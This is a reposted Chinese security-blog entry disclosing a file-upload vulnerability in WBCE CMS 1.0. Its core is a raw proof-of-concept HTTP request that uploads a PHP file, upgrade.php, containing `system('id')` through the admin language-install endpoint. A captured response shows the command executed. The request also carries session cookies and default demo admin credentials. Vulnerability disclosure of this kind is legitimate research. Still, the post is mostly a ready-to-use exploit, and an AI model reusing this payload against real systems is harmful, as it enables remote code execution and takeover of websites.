WBCE CMS | 文件上传漏洞

admin 2024年3月28日23:54:33评论26 views字数 3459阅读11分31秒阅读模式

使使使

影响版本

Version:1.0

WBCE CMS | 文件上传漏洞

poc&exp

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1Host: demos6.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.phpContent-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459Content-Length: 522Origin: https://demos6.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------86020911415982314764024459Content-Disposition: form-data; name="formtoken"5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c-----------------------------86020911415982314764024459Content-Disposition: form-data; name="userfile"; filename="upgrade.php"Content-Type: application/x-php<?php echo system('id'); ?>-----------------------------86020911415982314764024459Content-Disposition: form-data; name="submit"-----------------------------86020911415982314764024459--### Response : <!-- ################### Up from here: Original Code from original template ########### --><!-- senseless positioning-table: needed for old modules which base on class td.content --><div class="row" style="overflow:visible"><div class="fg12"><table id="former_positioning_table"><tr>    <td class="content">uid=1000(soft) gid=1000(soft) groups=1000(soft)uid=1000(soft) gid=1000(soft) groups=1000(soft)    <div class="top alertbox_error fg12 error-box">        <i class=" fa fa-2x fa-warning signal"></i>                    <p>Invalid WBCE CMS language file. Please check the text file.</p>                    <p><a href="index.php" class="button">Back

WBCE CMS | 文件上传漏洞WBCE CMS | 文件上传漏洞

原文始发于微信公众号(漏洞猎人):WBCE CMS | 文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月28日23:54:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WBCE CMS | 文件上传漏洞http://cn-sec.com/archives/2591628.html

发表评论

匿名网友 填写信息